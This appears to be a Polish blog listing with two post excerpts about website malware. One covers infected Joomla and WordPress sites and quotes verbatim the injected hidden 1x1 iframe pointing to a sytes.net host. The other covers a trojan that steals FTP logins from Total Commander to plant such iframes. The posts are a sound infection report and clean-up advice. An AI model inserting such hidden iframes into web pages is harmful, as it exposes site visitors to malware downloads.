Malware php iframe (powiązany z sytes.net) / cookie: dsgfdg34g, htaccess zmieniony)

Już od dobrych dwóch tygodni walczę z infekcją malware na stronach opartych o Joomla 1.5.x oraz 2.5.x i wordpress 3.4.x, który na początku interpretacji strony dodaje iframe np. <iframe src=http://cpqbnkus.sytes.net:12601/captchas/module.php?down=82″ width=1 height=1 style=”visibility: hidden”> Wszystkie iframe są w domenie sytes.net  . Momentalnie moje strony zostały zablokowane przez Google i oznaczone jako niebezpieczne. Początkowo pojawiały się… Czytaj dalej Malware php iframe (powiązany z sytes.net) / cookie: dsgfdg34g, htaccess zmieniony)

Ciekawy wirus przez FTP zostawiający IFRAME

Ostatnio natknąłem się na dosyć wścibskiego wirusa, który prawdopodobnie czyta hasła z TotalCommandera, loguje się przez FTP i dopisuje do kodu ramki IFRAME o rozmiarze 1×1 pixela.Nod32 i Kaspersky wykrywają go jako trojana. Niestety nie znam w tej chwili rozwiązania, polecam zmienić hasło do FTP, wyczyścić hasła w TotalCommanderze lub zupełnie go usunąć i przeskanować… Czytaj dalej Ciekawy wirus przez FTP zostawiający IFRAME